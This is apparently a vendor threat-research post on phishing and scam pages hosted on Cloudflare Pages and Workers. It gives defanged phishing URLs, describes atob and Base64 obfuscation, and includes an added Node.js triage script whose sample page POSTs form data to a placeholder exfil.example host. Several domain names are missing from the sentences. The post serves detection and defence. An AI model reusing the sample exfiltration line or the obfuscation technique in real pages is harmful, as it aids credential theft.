
It’s Raining Phish and Scams – How Cloudflare and Domains Get Abused

As they say, when it rains, it pours. Recently, we observed more than 3,000 phishing emails containing phishing URLs abusing services at and domains.

What is .dev Top Level Domain (TLD)?

The .dev top-level domain is operated by Google. It is included in the HTTP Strict Transport Security (HSTS) preload list, so browsers require HTTPS on every .dev domain without each site having to enrol in HSTS individually.

Cloudflare Pages vs Workers

Both and domains are part of Cloudflare’s web development and hosting services. Even though both of these domains offer web development services under Cloudflare, there are some significant differences between them.

In Cloudflare Pages, developers deploy a project by connecting it to a Git provider, while Cloudflare Workers provides a serverless execution environment. With, you can build your page and deploy it using your local resources.

Comparing the two Cloudflare services, despite the free trial offered in it seems is the most abused domain, probably because of the convenience and benefit of using a Git provider like GitHub in web development.

Abused Cloudflare Domains in Phishing Emails

As mentioned earlier, we observed a lot of phishing emails containing URLs using the domains or Most of the phishing emails mimic different companies and use alarming subjects related to payment details, voicemails, pending inquiries, etc. Some of the URLs in these emails used * as a redirector, and some are the actual phishing page.

Phishing email mimicking financial services company:


Figure 1. The email header containing a spoofed From address pretending to be from Westpac


Figure 1.1 Email body containing details about the payment made through Westpac

The email body also contains a phishing URL that uses the domain and carries the recipient’s email address in the URL path.


Figure 2. Screenshot of the actual phishing URL hxxp://a211a49a8bb35[.]pages[.]dev/?email={email address}

Phishing email with URL redirection:


Figure 3. The email header contains malicious mailer[.]php in X-PHP-Script

The mailer script sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php was used to compose and send the phishing email to the recipient.


Figure 3.1 Screenshot of sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php

However, the domain sondakikatokathaberleri[.]name[.]tr seems to be a WordPress site still under construction.


Figure 3.2 Screenshot of sondakikatokathaberleri[.]name[.]tr


Figure 4. The email body asking the recipient for an account update

The email body contains a clickable link to the original URL hxxps://3f303073[.]45564355zezdfxc56e667[.] ; that page contains JavaScript hosted on a site that redirects to hxxps://helpsana[.]ro/wp-hash/1/index4[.]php, which is the actual phishing page.


Figure 4.1 Screenshot of the source code of the URL containing phishing redirection


Figure 4.2 Screenshot of the phishing URL hxxps://helpsana[.]ro/wp-hash/1/index4[.]php

Other Phishing URLs with Cloudflare Pages and Workers

A phishing URL using was also seen targeting Microsoft. The page source calls the atob function on a variable that holds a Base64 string; atob decodes a string that has been Base64-encoded.


Figure 5. Screenshot of the actual phishing URL hxxps://1-d0asfasfjhasfa7979352jhasf.pages[.]dev/

When the Base64 string is decoded, it yields the URL hxxps://tutu57tututut[.]000webhostapp[.]com/don[.]php, where the stolen credentials will be stored.



Figure 5.1 Screenshot of the source code with usage of variable ‘olafatob’

Below is another sample of a phishing URL using the domain, this one targeting Dropbox. The page uses a similar obfuscation technique, decoding its content with the atob function.


Figure 6. Screenshot of Phishing URL



Figure 7. Screenshot of the encoded source code and usage of atob function
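The two pages above (Figures 5.1 and 7) hide their real endpoints in Base64 strings that are only decoded by atob() at runtime. The following is an added example, not code from the original post: a small Node.js script that resolves atob() arguments statically from a captured page source, decodes them and lists any URLs they hide, so an analyst can recover the credential-drop endpoint without executing the page. The sample HTML, the variable name olafatob and the decoded placeholder URL are constructed for the example.

```javascript
// Added example: static triage of a captured phishing page that hides its
// credential-drop URL in a Base64 literal revealed only via atob().
// Run with: node triage.js

// Constructed sample page source (not real phishing code). The variable name
// mirrors the 'olafatob' pattern; the decoded URL is a placeholder host.
const SAMPLE_HTML = `
<script>
var olafatob = "aHR0cHM6Ly9leGZpbC5leGFtcGxlL2Rvbi5waHA=";
var banner = atob("SGVsbG8gV29ybGQ=");
var dynamic = atob(location.hash.slice(1));   // not statically resolvable
function send(f) {
  fetch(atob(olafatob), { method: "POST", body: new FormData(f) });
}
</script>`;

// var/let/const NAME = "<base64 literal of 16+ chars>"
const VAR_ASSIGN = /(?:var|let|const)\s+(\w+)\s*=\s*["']([A-Za-z0-9+/]{16,}={0,2})["']/g;
// atob("<literal>") or atob(identifier)
const ATOB_CALL = /atob\(\s*(?:["']([A-Za-z0-9+/=]+)["']|(\w+))\s*\)/g;
const URL_RE = /https?:\/\/[^\s"'<>]+/g;

function decodeB64(s) {
  return Buffer.from(s, "base64").toString("utf8");
}

// One finding per atob() call whose argument can be resolved without running
// the page: where the literal came from, its decoded text and any URLs in it.
function triageAtob(html) {
  const vars = new Map();
  for (const m of html.matchAll(VAR_ASSIGN)) vars.set(m[1], m[2]);
  const findings = [];
  for (const m of html.matchAll(ATOB_CALL)) {
    const literal = m[1] ?? vars.get(m[2]);
    if (!literal) continue; // e.g. atob(location.hash): leave for dynamic analysis
    const decoded = decodeB64(literal);
    findings.push({ source: m[1] ? "literal" : m[2], decoded, urls: decoded.match(URL_RE) || [] });
  }
  return findings;
}

// Only the endpoints the page would contact after decoding: the detection signal.
function hiddenUrls(html) {
  return triageAtob(html).flatMap(f => f.urls);
}

console.log(JSON.stringify(triageAtob(SAMPLE_HTML), null, 2));
```

Calls whose argument is computed at runtime (like the location.hash case) are deliberately skipped rather than guessed; those pages need a sandboxed run.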

Cloudflare Pages and Workers in VirusTotal

Over a 90-day period, we observed in VirusTotal at least 60,000 URLs containing the domain, the majority of which were used in phishing activity.


Figure 8. Screenshot of a sample of URLs queried in VirusTotal with

Meanwhile, at least 65,000 URLs were also seen over the past 90 days. More than 11,000 of them were related to scams or fake news, and they were being blocked only by Trustwave:


Figure 9. Screenshot of the URLs query in VirusTotal


Figure 10. Screenshot of the fake news site

These scam URLs use keywords like cash, money or job in the domain name, followed by 1-3 digits, and often contain links that redirect to another scam site.


Figure 11. Screenshot of the sample redirection to another scam URL

As of this writing, some of the scam or phishing URLs have already been taken down by Cloudflare due to malicious activity.


We are seeing a huge number of phishing and scam pages abusing these .dev Cloudflare services; some phishers abused the free web services at large scale. We need to be very wary of and links that we see in email. Most of the phishing and scam pages we are seeing use redirection or encoded strings in the page content to avoid easy detection by AV products. Trustwave MailMarshal has protections for these campaigns.

Staying vigilant and updated on the latest threats is the most powerful key to avoid becoming a victim of such phishing or scams.

Some Samples of Scam or Fake News URLs with a Common Domain Format